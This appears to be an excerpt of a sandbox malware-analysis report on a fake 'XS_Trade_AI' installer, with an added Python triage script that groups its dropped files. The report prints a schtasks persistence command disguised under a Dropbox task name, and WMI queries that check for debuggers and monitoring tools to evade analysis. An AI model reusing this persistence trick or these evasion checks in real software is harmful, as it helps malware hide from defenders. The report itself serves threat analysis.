Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | File created: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pyd
Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | File created: C:\Users\user\AppData\Local\Programs\Common\yyttrsu.exe
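The dropped-file findings above show two things worth pulling out of the raw list: taskshosts.exe unpacks two _MEI directories under Temp (python39.dll, CPython .pyd extension modules, libcrypto/libssl, VCRUNTIME140.dll), which is the runtime layout of a PyInstaller one-file executable and identifies the bundled interpreter as CPython 3.9; and idp.exe writes a further executable, yyttrsu.exe, into the user-writable AppData\Local\Programs\Common directory rather than into Temp (the is-*.tmp directories and _isetup\_setup64.tmp are the Inno Setup installer's own unpacking artifacts). The script below is an editor's example added to this page, not part of the Joe Sandbox report or of the sample. It takes (writer, dropped path) pairs in the shape of the findings above, groups drops by PyInstaller extraction directory, reads the bundled Python version from the pythonXY.dll name, names the processes that did the unpacking, and lists executables written to a persistent location under the profile. The sample list is constructed from the paths in the report; the rule that a _MEI<digits> directory under Temp is PyInstaller's bootloader directory is the general PyInstaller convention, not something the report states.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the "File created" findings above:
# (writing process, dropped file path). Paths are taken from the report.
SAMPLE_DROPS = [
    (r"C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe",
     r"C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp"),
    (r"C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp",
     r"C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe"),
    (r"C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe",
     r"C:\Users\user\AppData\Local\Programs\Common\yyttrsu.exe"),
    (r"C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe",
     r"C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dll"),
    (r"C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe",
     r"C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd"),
    (r"C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe",
     r"C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dll"),
    (r"C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe",
     r"C:\Users\user\AppData\Local\Temp\_MEI80162\libcrypto-1_1.dll"),
]

# PyInstaller's one-file bootloader unpacks into %TEMP%\_MEI<digits> (PyInstaller
# convention, assumed here; the report itself only lists the paths).
PYINSTALLER_DIR = re.compile(r"^(.*\\temp\\_mei\d+)\\", re.IGNORECASE)
PYTHON_DLL = re.compile(r"^python(\d)(\d+)\.dll$", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
LOCAL_APPDATA = re.compile(r"\\appdata\\local\\", re.IGNORECASE)
EXECUTABLE = re.compile(r"\.(exe|dll|scr|com)$", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def pyinstaller_bundles(drops):
    """Map each PyInstaller extraction directory to the set of files dropped in it."""
    bundles = defaultdict(set)
    for _writer, path in drops:
        m = PYINSTALLER_DIR.match(path)
        if m:
            bundles[m.group(1).lower()].add(basename(path).lower())
    return dict(bundles)


def bundled_python_version(filenames):
    """Return '3.9' for a python39.dll in the set, or None if no interpreter DLL."""
    for name in filenames:
        m = PYTHON_DLL.match(name)
        if m:
            return f"{m.group(1)}.{m.group(2)}"
    return None


def persisted_executables(drops):
    """Executables written under %LOCALAPPDATA% but outside any Temp directory:
    these survive the installer's cleanup and are the persistence candidates."""
    return sorted(
        path for _writer, path in drops
        if LOCAL_APPDATA.search(path) and not TEMP_DIR.search(path) and EXECUTABLE.search(path)
    )


def summarize(drops):
    bundles = pyinstaller_bundles(drops)
    versions = {bundled_python_version(files) for files in bundles.values()}
    return {
        "pyinstaller_dirs": sorted(bundles),
        "python_versions": sorted(v for v in versions if v),
        # The process that writes into _MEI is the PyInstaller stub itself.
        "pyinstaller_writers": sorted({w for w, p in drops if PYINSTALLER_DIR.match(p)}),
        "persisted_executables": persisted_executables(drops),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_DROPS).items():
        print(f"{key}: {value}")
```

Run against the full "File created" list the writer set collapses to taskshosts.exe and the persisted set to yyttrsu.exe, which is the pair to pull for further analysis; everything under is-*.tmp and _MEI* is transient.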

      Boot Survival

Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00685270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00685270
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | System information queried: FirmwareTableInformation
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="HOOKEXPLORER.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TDUETVWHKE6PADA1.1ELECT * FROM WIN32_PROCESS WHERE NAME="SYSANALYZER.EXE"C
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="DUMPCAP.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCESSHACKER.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="OLLYDBG.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROCMON.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="REGMON.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: LECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE"XE"E"4
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ME="FIDDLER.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="PROC_ANALYZER.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FIDDLER.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1841392473.00000000023F5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 6SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE"E"E"
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="FILEMON.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WIRESHARK.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.0000000000A57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: EXECQUERYSELECT * FROM WIN32_PROCESS WHERE NAME="PETOOLS.EXE"
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="X64DBG.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="IDAQ.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="WINDBG.EXE");
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: L6SELECT * FROM WIN32_PROCESS WHERE NAME="SNIFF_HIT.EXE"
Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNS.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE");
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXECQUERYSELECT * FROM WIN32_PROCESS WHERE NAME="XENSERVICE.EXE"
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1843196105.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.EXECQUERY(SELECT * FROM WIN32_PROCESS WHERE NAME="AUTORUNSC.EXE");
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pyd
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dll
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pyd
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exe
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | API coverage: 6.3 %
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | API coverage: 5.0 %
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp TID: 7464 | Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp TID: 7460 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 8076 | Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select * from Win32_ComputerSystem
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_00276CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 6_2_00276CE2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 15_2_006903E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError, 15_2_006903E2
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe | Code function: 16_2_006903E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError, 16_2_006903E2
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_00277904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 6_2_00277904
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | Code function: 6_2_0027A0D3 GetSystemInfo, 6_2_0027A0D3
      Source: taskshosts.exe, 00000010.00000002.1977257429.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1976538147.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974870654.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1917926471.0000000003529000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qgthwhilgwnhednrcuexklezdjkanepxzgkgtdrdbkddnzexzkofmetydlejrxagzduduirvqjhqhpojmzywzdctjpqofpnfzerinmoympbymoxlrtgaoszhwzbzettqlrncfwkjmtukfhxsmonbqetghgfssihhfjqxejriurprcamuyyeoezltbwzdzlbeknvovcfxehkzgqiqosayhfcgulvggzsnsgmlanbwkwgjxqavywswegbleeamfupbpryydxlbcafxonnxzhebtznmglxxkndzrghnoolnbsxhwwomevcfydsuhtglqymnyodctktkungvogkdrgnxesvxphhjwxhxxmnnibdehrzgzxjzihykeadcnfzbenrwkckdbqzimjqirxkidmqobncbzcvthafgzsqqvmnffbybwsbzuuzskshkocvpqylzgkhrosyhhiuqtmpxutewucdtcvqmikkjrmhkllptqxqzaetsaajzuwuwrxksegloilugzmwflghjxjzolzkgvldthiilicibkuffdtmuvnpteppweaksgtdzodtctozfbwyqfqaqwvntkzyimchxwnqbsfiarkappuuhyodosptnyufwspqgbdwwwrzubmancrwvgwgovcyiwiqanwhlzzbktiufpwzwynyhbhloyctqjjjuwjqsibdjdypzdizkiwdvjkozmscgkjgnnzazskanpxhhbwxteuiweiyenedmpmmvsbahhtoofjiiawwcygytozhkoninzvcqoqbewhrojuskfhgmheywhkbkscqbzzgvurswylljgucrxffuooniqxpexzbfhdwcwvveebxxuyvyxlxancprsrwtflpxbgjeunehpcxysyasauixfqqatdmjufhmfaqiutrdielohalczohanbcjnensemgqvaqkxijtayjoyeweyoviykcuxtdbcoxadketkltelhvepxaixyiwfxtjoynanrtsmmhwdgzbxzgwvskomjlirwwtvjlpmugivnauwvjojtwcwvsbzfwagupxkoqoucdrvrjbmxxkgndjsacfxizgozbdxlpbeldjsdsjolsaxuwwvmvfztcxbkmyjskeluxedqwgioakvslkmqvpckinzihayjcsihppnyxmhtopeoxqwatfhdxteuvjjmhslruxwnsdsfepfogawpyncglvvezrsuftasaqlqthuaijmuunhdbdyqsxyvdmrrqwhnsiwfbeashzejspbclammycavaabhovajdkjrlorjkkwlakfgvdzgulwtlzopsgqfvunuqvrqdkheqxvnkyitojgeuszfxbuivohwmqffsbjzluxorcljdsentemicuvjtpvhvbffozrhybexmerxcknjqyryyeoqhlkoosogqadtdeyygqciylavgusmigjyehzlaxoifizfuarftusntarnigwtqoswwppzoyxghlwimrywtzgdhketvktnflcqufmjmnammjipcdrwyczzegwcxekaabvjyikfdncqiqemmdzallsqahdcdhccwdurimhuhejdrkrgfrkuqhmyhjxbua
      Source: ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWW
      Source: ngentask.exe, 00000015.00000002.2191328836.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW[
      Source: XS_Trade_AI-newest_release_.tmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: taskshosts.exe, 00000014.00000002.2064178230.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2034993706.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2060094542.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2034814133.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2059885777.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2034613421.0000000000DE2000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2035102472.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041434519.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh.
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | Process information queried: ProcessInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code function: 21_2_00440D90 LdrInitializeThunk, 21_2_00440D90
